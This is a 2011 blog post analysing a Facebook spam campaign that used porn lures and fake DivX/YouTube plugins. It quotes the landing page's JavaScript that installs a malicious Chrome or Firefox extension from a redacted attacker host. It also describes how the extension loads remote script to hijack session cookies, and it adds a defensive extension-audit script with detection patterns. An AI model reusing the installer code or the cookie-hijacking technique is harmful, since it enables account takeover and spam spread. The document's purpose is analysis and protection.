December 21, 2011 · Facebook Scam

Facebook Porn Scam Attack: The Complete Story

Facebook users are being targeted by a heavy spam attack. Spam on Facebook is not uncommon, but this time 2 out of every 10 profiles reportedly contain the spammed links, which pretend to show porn and use very attractive subject lines such as "this is really hot prakhar, Look now! hahaha". In this blog post I will tell the complete story: how those links spread and how to protect yourself from such attacks.

First of all the spam starts with a wall post which claims to be porn.

When the user opens the link in the hope of viewing porn, he/she lands on a malicious website that is designed to look like Facebook's video page and is filled entirely with fake comments and likes. The user is then asked to install a DivX plugin to view the video.

The plugin website is quite clever: it contains code that detects which browser the user is running and loads a malicious plugin for that browser. See the following JavaScript code grabbed from the page.

var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;  
var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;

function instalar() {  
    if (is_chrome) {
        window.open("http://tmz[removed].com/youtube.crx");
    } else if (is_firefox) {
        var params = {
            "Youtube Extension": {
                URL: "http://tmz[removed].com/youtube.xpi",
                toString: function() {
                    return this.URL;
                }
            }
        };
        InstallTrigger.install(params);
    } else {
        window.open("");
    }
}

From the above code it is clear that if the browser is Google Chrome the page loads the extension "youtube.crx", and if the browser is Mozilla Firefox it loads the plugin "youtube.xpi". The loading and installation of the plugin is shown below.

After the malicious plugin is installed in the browser, whenever the user navigates to facebook.com the plugin secretly tries to load and execute a JavaScript file from an external address, http://tmz[removed].com/script.js. This JS file runs in the browser and uses the logged-in Facebook user's cookie (which the plugin actually fetches) to gain temporary access to the user's account (session hijacking). It then retrieves the friends list (using XHR requests) and starts posting the links on the walls of the user's friends.
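An added example, not code from the original post or from the malicious extension: a static triage of an unpacked Chrome extension for the behaviour described above (a script on facebook.com that pulls JavaScript from an external host). It assumes the hook is declared under `content_scripts` in `manifest.json`; the function name, rule names and sample data are constructed, and `placeholder.invalid` stands in for the redacted host.

```javascript
// Static triage of an unpacked Chrome extension (added example, constructed data).
// Assumption: the extension hooks Facebook through manifest.json "content_scripts".
const FACEBOOK_MATCH = /(^|[/.*])facebook\.com/i;
// A URL literal ending in .js: code fetched at run time instead of shipped in the package.
const REMOTE_JS = /https?:\/\/[^\s"'<>]+\.js\b/gi;
const SCRIPT_INJECT = /createElement\(\s*["']script["']\s*\)/i;

function auditExtension(manifest, files) {
  const findings = [];
  for (const cs of manifest.content_scripts || []) {
    const hitsFacebook = (cs.matches || []).some((m) => m === "<all_urls>" || FACEBOOK_MATCH.test(m));
    if (!hitsFacebook) continue;
    for (const name of cs.js || []) {
      const src = files[name] || "";
      const urls = src.match(REMOTE_JS) || [];
      if (urls.length > 0 && SCRIPT_INJECT.test(src)) {
        findings.push({ rule: "remote-script-on-facebook", file: name, urls });
      }
      if (/document\.cookie/.test(src)) {
        findings.push({ rule: "cookie-read-on-facebook", file: name, urls: [] });
      }
    }
  }
  if ((manifest.permissions || []).includes("cookies")) {
    findings.push({ rule: "cookies-permission", file: "manifest.json", urls: [] });
  }
  return findings;
}

// Constructed sample modelled on the description above, with a placeholder host.
const sampleManifest = {
  name: "Youtube Extension",
  permissions: ["cookies", "http://*/*", "https://*/*"],
  content_scripts: [{ matches: ["*://*.facebook.com/*"], js: ["inject.js"] }],
};
const sampleFiles = {
  "inject.js":
    'var s = document.createElement("script");\n' +
    's.src = "http://placeholder.invalid/script.js";\n' +
    "document.head.appendChild(s);\n",
};
const benignManifest = {
  name: "Notes",
  content_scripts: [{ matches: ["*://notes.example/*"], js: ["notes.js"] }],
};

console.log(auditExtension(sampleManifest, sampleFiles));
```

A finding here is a reason to read the extension's source by hand, not a verdict; a sample that obfuscates its URL or builds the script tag differently will not match these patterns.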

The spamming routine ends with the spam link being circulated to multiple friends of the user, and the cycle continues. To my surprise, none of the 43 antiviruses on VirusTotal.com detected those malicious plugins.

To protect yourself from such attacks, read these:

http://facecrooks.com/Scam-Watch/The-Ultimate-Guide-to-Facebook-Scams.html
http://facecrooks.com/Scam-Watch/Top-Ten-Facebook-Scams-to-Avoid.html
http://facecrooks.com/Internet-Safety-Privacy/6-things-you-need-to-do-right-now-to-prepare-for-the-new-facebook-timeline.html

If you have any questions, please post a comment below.